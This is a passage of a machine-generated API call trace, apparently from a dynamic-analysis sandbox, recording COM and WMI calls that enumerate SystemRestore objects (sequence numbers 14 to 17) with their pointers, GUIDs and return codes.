CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.659] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738070, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.659] WbemDefPath:IUnknown:Release (This=0x6738070) returned 0x2 [0116.659] WbemDefPath:IUnknown:Release (This=0x6738070) returned 0x1 [0116.659] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.659] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.659] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738070, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x6738070) returned 0x0 [0116.659] WbemDefPath:IUnknown:AddRef (This=0x6738070) returned 0x3 [0116.659] WbemDefPath:IUnknown:Release (This=0x6738070) returned 0x2 [0116.659] WbemDefPath:IWbemPath:SetText (This=0x6738070, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=14") returned 0x0 [0116.659] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.659] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.659] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.659] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.659] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.660] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.660] IWbemClassObject:Get (in: This=0x673afa0, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352ceb0*=0, plFlavor=0x352ceb4*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe, varVal2=0x0), pType=0x352ceb0*=19, plFlavor=0x352ceb4*=0) returned 0x0 [0116.660] IWbemClassObject:Get (in: This=0x673afa0, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352ceb0*=19, plFlavor=0x352ceb4*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe, varVal2=0x0), pType=0x352ceb0*=19, plFlavor=0x352ceb4*=0) returned 0x0 [0116.660] CoTaskMemAlloc (cb=0x4) returned 0x77c318 [0116.660] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77c318, puReturned=0x3526b58 | out: apObjects=0x77c318*=0x673b138, puReturned=0x3526b58*=0x1) returned 0x0 [0116.661] IUnknown:QueryInterface (in: This=0x673b138, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x673b138) returned 0x0 [0116.661] IUnknown:QueryInterface (in: This=0x673b138, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.661] IUnknown:QueryInterface (in: This=0x673b138, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.661] IUnknown:AddRef (This=0x673b138) returned 0x3 [0116.661] IUnknown:QueryInterface (in: This=0x673b138, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.661] IUnknown:QueryInterface (in: This=0x673b138, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.661] IUnknown:QueryInterface (in: This=0x673b138, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x673b13c) returned 0x0 [0116.661] IMarshal:GetUnmarshalClass (in: This=0x673b13c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.661] IUnknown:Release (This=0x673b13c) returned 0x3 [0116.661] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.661] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.661] IUnknown:QueryInterface (in: This=0x673b138, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.662] IUnknown:Release (This=0x673b138) returned 0x2 [0116.662] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.662] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.662] IUnknown:QueryInterface (in: This=0x673b138, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x673b138) returned 0x0 [0116.662] IUnknown:AddRef (This=0x673b138) returned 0x4 [0116.662] IUnknown:Release (This=0x673b138) returned 0x3 [0116.662] IUnknown:Release (This=0x673b138) returned 0x2 [0116.662] CoTaskMemFree (pv=0x77c318) [0116.662] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.662] IUnknown:AddRef (This=0x673b138) returned 0x3 [0116.662] IWbemClassObject:Get (in: This=0x673b138, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.662] IWbemClassObject:Get (in: This=0x673b138, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=15", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.662] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=15") returned 0x70 [0116.662] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=15") returned 0x70 [0116.662] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.662] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.662] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.662] IUnknown:Release (This=0x72015c) returned 0x1 [0116.663] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736e38) returned 0x0 [0116.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e38, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.663] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e38, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x67380e0) returned 0x0 [0116.664] WbemDefPath:IUnknown:Release (This=0x6736e38) returned 0x0 [0116.664] WbemDefPath:IUnknown:QueryInterface (in: This=0x67380e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x67380e0) returned 0x0 [0116.664] WbemDefPath:IUnknown:QueryInterface (in: This=0x67380e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.664] WbemDefPath:IUnknown:AddRef (This=0x67380e0) returned 0x3 [0116.664] WbemDefPath:IUnknown:QueryInterface (in: This=0x67380e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.664] WbemDefPath:IUnknown:QueryInterface (in: This=0x67380e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.664] WbemDefPath:IUnknown:QueryInterface (in: This=0x67380e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77c318) returned 0x0 [0116.664] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c318, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.664] WbemDefPath:IUnknown:Release (This=0x77c318) returned 0x3 [0116.664] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.664] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.664] WbemDefPath:IUnknown:QueryInterface (in: This=0x67380e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.665] WbemDefPath:IUnknown:Release (This=0x67380e0) returned 0x2 [0116.665] WbemDefPath:IUnknown:Release (This=0x67380e0) returned 0x1 [0116.665] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.665] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.665] WbemDefPath:IUnknown:QueryInterface (in: This=0x67380e0, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x67380e0) returned 0x0 [0116.665] WbemDefPath:IUnknown:AddRef (This=0x67380e0) returned 0x3 [0116.665] WbemDefPath:IUnknown:Release (This=0x67380e0) returned 0x2 [0116.665] WbemDefPath:IWbemPath:SetText (This=0x67380e0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=15") returned 0x0 [0116.665] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.665] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.665] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.665] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.665] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.665] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.665] IWbemClassObject:Get (in: This=0x673b138, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352d700*=0, plFlavor=0x352d704*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf, varVal2=0x0), pType=0x352d700*=19, plFlavor=0x352d704*=0) returned 0x0 [0116.665] IWbemClassObject:Get (in: This=0x673b138, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352d700*=19, plFlavor=0x352d704*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf, varVal2=0x0), pType=0x352d700*=19, plFlavor=0x352d704*=0) returned 0x0 [0116.665] CoTaskMemAlloc (cb=0x4) returned 0x77c358 [0116.666] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77c358, puReturned=0x3526b58 | out: apObjects=0x77c358*=0x673b2d0, puReturned=0x3526b58*=0x1) returned 0x0 [0116.666] IUnknown:QueryInterface (in: This=0x673b2d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x673b2d0) returned 0x0 [0116.666] IUnknown:QueryInterface (in: This=0x673b2d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.666] IUnknown:QueryInterface (in: This=0x673b2d0, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.666] IUnknown:AddRef (This=0x673b2d0) returned 0x3 [0116.666] IUnknown:QueryInterface (in: This=0x673b2d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.666] IUnknown:QueryInterface (in: This=0x673b2d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.666] IUnknown:QueryInterface (in: This=0x673b2d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x673b2d4) returned 0x0 [0116.666] IMarshal:GetUnmarshalClass (in: This=0x673b2d4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.666] IUnknown:Release (This=0x673b2d4) returned 0x3 [0116.666] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.667] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.667] IUnknown:QueryInterface (in: This=0x673b2d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.667] IUnknown:Release (This=0x673b2d0) returned 0x2 [0116.667] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.667] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.667] IUnknown:QueryInterface (in: This=0x673b2d0, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x673b2d0) returned 0x0 [0116.667] IUnknown:AddRef (This=0x673b2d0) returned 0x4 [0116.667] IUnknown:Release (This=0x673b2d0) returned 0x3 [0116.667] IUnknown:Release (This=0x673b2d0) returned 0x2 [0116.667] CoTaskMemFree (pv=0x77c358) [0116.667] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.667] IUnknown:AddRef (This=0x673b2d0) returned 0x3 [0116.667] IWbemClassObject:Get (in: This=0x673b2d0, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.667] IWbemClassObject:Get (in: This=0x673b2d0, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=17", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.667] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=17") returned 0x70 [0116.667] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=17") returned 0x70 [0116.667] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.667] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.667] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.668] IUnknown:Release (This=0x72015c) returned 0x1 [0116.668] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736e48) returned 0x0 [0116.668] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e48, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.668] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e48, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x6738150) returned 0x0 [0116.668] WbemDefPath:IUnknown:Release (This=0x6736e48) returned 0x0 [0116.668] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738150, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x6738150) returned 0x0 [0116.669] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738150, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.669] WbemDefPath:IUnknown:AddRef (This=0x6738150) returned 0x3 [0116.669] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738150, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.669] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738150, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.669] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738150, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77c358) returned 0x0 [0116.669] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c358, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, 